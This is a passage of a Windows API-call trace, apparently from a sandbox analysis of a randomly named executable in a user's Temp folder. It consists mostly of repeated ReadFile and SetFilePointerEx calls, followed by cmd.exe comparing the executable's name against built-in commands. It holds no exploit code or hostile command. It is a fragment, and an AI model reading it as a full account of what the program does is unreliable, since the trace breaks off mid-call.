liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.159] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.183] _close (_FileHandle=4) returned 0 [0107.183] FindNextFileW (in: hFindFile=0x350f78, lpFindFileData=0x26f1b0 | out: lpFindFileData=0x26f1b0) returned 0 [0107.183] GetLastError () returned 0x12 [0107.183] FindClose (in: hFindFile=0x350f78 | out: hFindFile=0x350f78) returned 1 [0107.184] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0107.187] _close (_FileHandle=3) returned 0 [0107.187] GetConsoleTitleW (in: lpConsoleTitle=0x26f64c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.187] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe\"")) returned 0xffffffff [0107.187] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.187] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.187] _wcsicmp 
